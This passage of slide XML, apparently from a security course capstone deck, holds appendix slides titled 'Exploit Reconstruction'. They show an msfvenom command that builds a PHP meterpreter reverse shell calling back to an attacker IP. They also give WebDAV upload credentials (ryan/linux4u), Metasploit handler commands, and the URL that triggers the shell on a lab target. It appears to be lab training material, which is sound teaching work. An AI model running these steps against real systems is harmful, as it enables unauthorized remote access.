              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429E8EDC-80AE-4D6F-AC9A-F9D69A9E455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5605669" y="1460208"/>
            <a:ext cx="3412435" cy="1918192"/>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9559E436-281C-421F-A11F-6AC6FC84FD84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="470452" y="2820883"/>
            <a:ext cx="5135217" cy="1646642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1855904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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Upload a PHP reverse shell payload…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--- Create a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Kali’s IP Address: 192.168.1.90 (Attacking machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Capstone’s IP Address: 192.168.1.105 (Target machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>wx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Copy payload to the server…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	In Kali navigate to Network File Manager/Browse Network: dav://192.168.1.105/webdav/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			Username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ryan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Copy msfvenom payload `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` to `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dav://192.168.1.105/webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCBD017-A9C7-4B7F-ABD8-5AA1D8282F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="880547" y="2119672"/>
            <a:ext cx="7382905" cy="771633"/>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97A2D4D6-D6F2-4C49-B64A-3F8A3238F8DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748747" y="3286734"/>
            <a:ext cx="2439872" cy="1845042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2582055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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Start the listener &gt; msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set payload php/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set LHOST 192.168.1.90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Execute the payload…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>In the web browser access the payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.105/webdav/shell.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9645E6E7-A7E7-43B1-8501-B654EBEA4DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4314694" y="1284250"/>
            <a:ext cx="4424031" cy="3152517"/>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59984D5-89A3-4E7A-9830-564D593DA22A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="162807" y="3193584"/>
            <a:ext cx="4151887" cy="1331331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3817902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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Your listening msfconsole will have a meterpreter prompt ready to send commands and shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
